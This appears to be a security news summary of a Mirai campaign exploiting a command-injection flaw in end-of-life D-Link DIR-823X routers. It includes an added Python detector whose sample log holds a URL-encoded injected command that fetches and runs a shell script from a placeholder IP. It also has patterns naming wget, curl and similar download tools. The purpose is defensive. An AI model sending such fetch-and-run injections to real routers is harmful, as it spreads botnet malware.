New Mirai campaign exploits RCE flaw in EoL D-Link routers
Source: Bleeping Computer

Vulnerability Overview
A new Mirai‑based malware campaign is actively exploiting CVE‑2025‑29635, a high‑severity command‑injection vulnerability affecting D‑Link DIR‑823X routers. The flaw allows an attacker to execute arbitrary commands on remote devices by sending a POST request to a vulnerable endpoint, triggering remote command execution (RCE).
The vulnerability was first disclosed 13 months ago by security researchers Wang Jinshuai and Zhao Jiangting. Akamai’s SIRT detected the first active in‑the‑wild exploitation in March 2026.
Exploitation Campaign
Akamai’s SIRT observed attackers sending POST requests that:
- Change directories across writable paths.
- Download a shell script (dlink.sh) from an external IP.
- Execute the script, which installs a Mirai‑based malware named tuxnokill (supports multiple architectures).
The script enables Mirai’s standard DDoS capabilities, including TCP SYN/ACK/STOMP, UDP floods, and HTTP null attacks.
Figure: The observed POST requests (Source: Akamai)
The researchers who originally disclosed the flaw briefly published a proof‑of‑concept exploit on GitHub, but later retracted it.
Akamai also identified that the same threat actor is exploiting:
- CVE‑2023‑1389 – affecting TP‑Link routers.
- An unnamed RCE flaw in ZTE ZXV10 H108L routers.
All attacks follow the same pattern, culminating in the deployment of the Mirai payload.
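
Detection logic for the request pattern described above (directory changes across writable paths, download of a shell script from an external IP, then execution of that script), added here as an example and not taken from Akamai or BleepingComputer. The log layout, the endpoint placeholder, the directory and download-tool lists, and the sample lines are constructed assumptions; the article does not give them.

```python
import re
from urllib.parse import unquote_plus

# Assumed, not from the article: directory list, download tools, log layout.
CD_RE = re.compile(r"\bcd\s+(?:/tmp|/var/run|/var/tmp|/dev/shm|/mnt|/var)(?=[\s;|&]|$)")
FETCH_RE = re.compile(
    r"\b(wget|curl|tftp|ftpget)\b[^;|&\n]*?"   # download utility
    r"(\d{1,3}(?:\.\d{1,3}){3})[^;|&\n]*?"     # staging host given as a bare IP
    r"([\w.-]+\.sh)\b"                         # shell script being fetched
)
LINE_RE = re.compile(r'^(\S+) "POST (\S+)" body=(.*)$')

# Constructed sample lines; addresses are documentation ranges (RFC 5737).
SAMPLE_LOG = [
    '198.51.100.23 "POST /PLACEHOLDER-ENDPOINT" body=field=x%3Bcd+%2Ftmp+%7C%7C+cd+'
    '%2Fvar%2Frun%3B+wget+http%3A%2F%2F203.0.113.7%2Fdlink.sh%3B+sh+dlink.sh',
    '192.0.2.10 "POST /PLACEHOLDER-ENDPOINT" body=field=office-wifi&mode=save',
    '192.0.2.44 "POST /PLACEHOLDER-ENDPOINT" body=note=download+dlink.sh+manual+from+vendor',
]

def inspect_body(raw_body):
    """Return details if a POST body fetches a .sh from an IP and then runs it."""
    body = unquote_plus(raw_body)              # undo form URL-encoding first
    fetch = FETCH_RE.search(body)
    if not fetch:
        return None
    tool, host, script = fetch.groups()
    run_re = re.compile(r"(?:^|[;&|\s])(?:sh|bash|ash)\s+(?:\./)?" + re.escape(script) + r"\b")
    if not run_re.search(body, fetch.end()):   # execution must follow the download
        return None
    return {"tool": tool, "staging_host": host, "script": script,
            "cd_hops": len(CD_RE.findall(body))}

def scan(lines):
    """Return one finding per log line whose POST body matches the pattern."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        hit = inspect_body(m.group(3)) if m else None
        if hit:
            findings.append({"src": m.group(1), "path": m.group(2), **hit})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The third sample line mentions the script name without a download or execution and is not flagged, which keeps a bare filename match from generating alerts.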
Impact and Recommendations
The affected DIR‑823X devices reached end‑of‑life (EoL) in November 2024. Consequently, the latest available firmware likely does not address CVE‑2025‑29635, and D‑Link has indicated it will not issue a patch for this vulnerability.
Recommendations for users of EoL routers:
- Upgrade to a newer router model that receives regular security updates.
- Disable remote administration portals if they are not required.
- Change default admin passwords to strong, unique credentials.
- Monitor router configurations for unexpected changes.
BleepingComputer has reached out to D‑Link for comment on the activity and the status of any fix and will update the article when a response is received.